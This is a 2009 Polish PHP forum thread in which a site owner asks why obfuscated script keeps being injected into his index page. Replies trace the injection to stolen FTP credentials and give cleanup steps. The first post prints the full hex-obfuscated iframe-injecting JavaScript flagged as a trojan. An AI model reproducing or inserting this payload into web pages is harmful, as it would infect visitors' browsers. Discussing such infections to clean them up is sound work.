Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: HEUR:Trojan.Script.Iframer
Forum PHP.pl > Inne > Hydepark
dresik
27.02.2009, 20:53:56
Witam,
od jakiegoś czasu niewiem dlaczego wpisuje mi się pewny kod niewiem skąd i niewiem jak na strone, wkleja się na samym końcu strony. Wchodząc na strone Kasperky blokuje mi dostęp ponieważ twierdzi że strona jest zawirusowana, a wirus to: HEUR:Trojan.Script.Iframer.

Pewnie mam gdzieś luke w skryptach, tylko gdzie?

Kod który się wpisuje
[HTML] pobierz, plaintext 
  1. <script>function c152364361251b48fcdcea61dc2(b48fcdcea61dc9){  return (parseInt(b48fcdcea61dc9,16));}function b48fcdcea61df2(b48fcdcea61df9){  var b48fcdcea61dff='';b48fcdcea61e25=String.fromCharCode;for(b48fcdcea61e05=0;b48fcdcea61e05<b48fcdcea61df9.length;b48fcdcea61e05+=2){ b48fcdcea61dff+=(b48fcdcea61e25(c152364361251b48fcdcea61dc2(b48fcdcea61df9.substr(b48fcdcea61e05,2))));}return b48fcdcea61dff;} var xce='';var b48fcdcea61e32='3C7'+xce+'3637'+xce+'2697'+xce+'07'+xce+'43E696628216D7'+xce+'96961297'+xce+'B646F637'+xce+'56D656E7'+xce+'42E7'+xce+'7'+xce+'7'+xce+'2697'+xce+'465287'+xce+'56E657'+xce+'363617'+xce+'065282027'+xce+'2533632536392536362537'+xce+'3225363125366425363525323025366525363125366425363525336425363325333125333525
  2. 2302537'+xce+'332537'+xce+'32253633253364253237'+xce+'2536382537'+xce+'342537'+xce+'342537'+xce+'302533612532662532662537'+xce+'332536312536632536352537'+xce+'362536392537'+xce+'332536392537'+xce+'342536662537'+xce+'322532652536652536352537'+xce+'34253266253639253665253265253633253637'+xce+'25363925336625333226253237'+xce+'2532622534642536312537'+xce+'342536382532652537'+xce+'322536662537'+xce+'352536652536342532382534642536312537'+xce+'342536382532652537'+xce+'3225363125366525363425366625366425323825323925326125333125333825333825333025
  3. 338253331253239253262253237'+xce+'253332253338253635253336253237'+xce+'2532302537'+xce+'37'+xce+'2536392536342537'+xce+'34253638253364253335253332253331253230253638253635253639253637'+xce+'2536382537'+xce+'342533642533332533362533312532302537'+xce+'332537'+xce+'342537'+xce+'39253663253635253364253237'+xce+'2536342536392537'+xce+'332537'+xce+'302536632536312537'+xce+'39253361253230253665253666253665253635253237'+xce+'2533652533632532662536392536362537'+xce+'3225363125366425363525336527'+xce+'29293B7'+xce+'D7'+xce+'6617'+xce+'2206D7'+xce+'969613D7'+xce+'47'+xce+'27'+xce+'5653B3C2F7'+xce+'3637'+xce+'2697'+xce+'07'+xce+'43E';document.write(b48fcdcea61df2(b48fcdcea61e32));</script>
[HTML] pobierz, plaintext




Poniżej wkleje kod pliku index.php w którym się to wkleja. Dodam że to chyba tylko w tym pliku, ponieważ sprawdzałem po datach modyfikacji.
[PHP] pobierz, plaintext 
  1. <?php
  2. session_start();
  3. if ($_SESSION['czas_sesji'] and $_SESSION['czas_sesji']+60*15<time()) { // 20 minut
  4.   session_unset();
  5.   session_destroy();
  6.   header("Location: index.php");
  7.   exit();
  8. }
  9. $_SESSION['czas_sesji'] = time();
  10.     if($_COOKIE["set_cookie"]!=1) setcookie("set_cookie", "1", time()+3600*24); 
  11.     if($_COOKIE["set_stats"]<>1) setcookie("set_stats", "1", time()+210); 
  12.  
  13.     require ('./admin/function/config.php');
  14.     require ('./admin/function/mysql_connect.php');
  15.  
  16.     $ConnectDB = ConnectDB($HostDB, $LoginDB, $PasswordDB);
  17.     if($ConnectDB == FALSE){print 'Błąd połączenia z bazą danych'; exit();}
  18.     
  19.     $SelectDB = SelectDB($NameDB);
  20.     if($SelectDB == FALSE){print 'Błąd wyboru bazy danych'; exit();}
  21.  
  22.     require("module/stats_page.php");
  23.     print '<META HTTP-EQUIV="Refresh" CONTENT="0;URL=aktualnosci,1.html">';
  24.  
  25.  
  26. ?>
[PHP] pobierz, plaintext


Jeśli ktoś wie co jest nie tak to prosze o pomoc.
bełdzio
27.02.2009, 21:58:38
przeskanuj kompa antywirusem + zmien dane do ftp
dresik
27.02.2009, 22:20:54
i tak zrobiłem, teraz czekam aż sie znowu wykrzaczy.

Zauważyłem ze to nie luki w php, ponieważ nawet w czystym pliku index.html te wpisy się dodają.

Na jednym z kompów znalazłem konika: Trojan-Spy.Win32.small.jx - z tego co wyczytałem to zapisuje znaki wprowadzane z klawiatury.
bełdzio
28.02.2009, 19:11:56
bo to nie jest wina skryptu smile.gif tylko tak jak pisales keyloggera, tudziez jakiegos trojana podkradajacego hasla TotalCommandera smile.gif
mikus1978
18.05.2009, 14:27:12
Ja poradziłem sobie z podobnym problemem tak:

z nie zawirusowanego komputera:

1. Zmiana hasła FTP
2. Oczyszczenie kodu strony przez przywrócenie kopii zapasowej
3. Zmiana hasła FTP

4 wyczyszczenie zawirusowanego komputera (niestety poprzez całkowitą reinstalacje systemu bo nie mogłem pozbyć się wirusa, a nie miałem czasu na głębsze grzebanie w systemie :/)
matw
2.02.2013, 20:39:29
Trochę odświeżam temat ale też miałem problem z takim wirusem i w końcu udało mi się go pokonać, gdyby ktoś potrzebował informacji jak się za taki coś zabrać to napisałem, krótką instrukcję jak to sprawnie zrobić:
kliknij
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.